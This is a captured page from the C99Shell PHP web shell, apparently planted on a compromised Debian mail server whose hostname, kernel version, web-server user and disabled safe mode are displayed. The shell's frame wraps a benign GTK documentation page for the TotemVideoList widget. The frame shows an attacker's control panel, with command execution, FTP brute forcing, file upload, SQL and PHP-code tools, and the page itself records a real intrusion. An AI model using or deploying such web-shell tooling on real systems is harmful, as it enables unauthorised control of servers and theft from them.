!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/totem/   drwxr-xr-x
Free 130.05 GB of 142.11 GB (91.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     TotemVideoList.html (14.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
TotemVideoList

TotemVideoList

TotemVideoList — a GtkTreeView widget for listing videos

Stability Level

Unstable, unless otherwise indicated

Object Hierarchy

  GObject
   +----GInitiallyUnowned
         +----GtkObject
               +----GtkWidget
                     +----GtkContainer
                           +----GtkTreeView
                                 +----TotemVideoList

Implemented Interfaces

TotemVideoList implements AtkImplementorIface and GtkBuildable.

Properties

  "mrl-column"               gint                  : Read / Write
  "tooltip-column"           gint                  : Read / Write
  "totem"                    TotemObject*          : Read / Write

Signals

  "starting-video"                                 : Run Last

Description

TotemVideoList is a GtkTreeView designed for listing videos by their thumbnails using TotemCellRendererVideo. It supports tooltips, loading the videos by activating tree view rows, and GtkUIManager actions in the popup menu.

Details

TotemVideoList

typedef struct _TotemVideoList TotemVideoList;

All the fields in the TotemVideoList structure are private and should never be accessed directly.


TotemVideoListClass

typedef struct {
	GtkTreeViewClass parent;
	gboolean (*starting_video) (TotemVideoList *video_list, GtkTreePath *path);
} TotemVideoListClass;

The class structure for the TotemVideoList type.

GtkTreeViewClass parent;

the parent class

starting_video ()

the generic signal handler for the "starting-video" signal, which can be overridden by inheriting classes

totem_video_list_new ()

TotemVideoList *    totem_video_list_new                (void);

Creates a new TotemVideoList with default properties.

Returns :

a new TotemVideoList

totem_video_list_get_ui_manager ()

GtkUIManager *      totem_video_list_get_ui_manager     (TotemVideoList *self);

Returns the GtkUIManager in use by self.

self :

a TotemVideoList

Returns :

self's GtkUIManager

Property Details

The "mrl-column" property

  "mrl-column"               gint                  : Read / Write

The column number of the GtkTreeModel column containing MRLs of the videos in the video list. If it's set to -1, video rows will not be activatable (e.g. by double-clicking them).

Allowed values: >= G_MAXULONG

Default value: -1


The "tooltip-column" property

  "tooltip-column"           gint                  : Read / Write

The column number of the GtkTreeModel column containing tooltips to be displayed by the video list. If it's set to -1, no tooltips shall be displayed.

Allowed values: >= G_MAXULONG

Default value: -1


The "totem" property

  "totem"                    TotemObject*          : Read / Write

A TotemObject for integration purposes.

Signal Details

The "starting-video" signal

gboolean            user_function                      (TotemVideoList *video_list,
                                                        GtkTreePath    *tree_path,
                                                        gpointer        user_data)       : Run Last

The "starting-video" signal is emitted when a video row is activated, just before the video is added to the playlist. It allows for the video's MRL in the GtkTreeModel to be modified, for example.

If this returns TRUE, the video will be played; otherwise, it will not.

video_list :

the TotemVideoList which received the signal

tree_path :

the GtkTreePath of the video row about to be played

user_data :

user data set when the signal handler was connected.

See Also

#TotemCellRendererVideo

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0179 ]--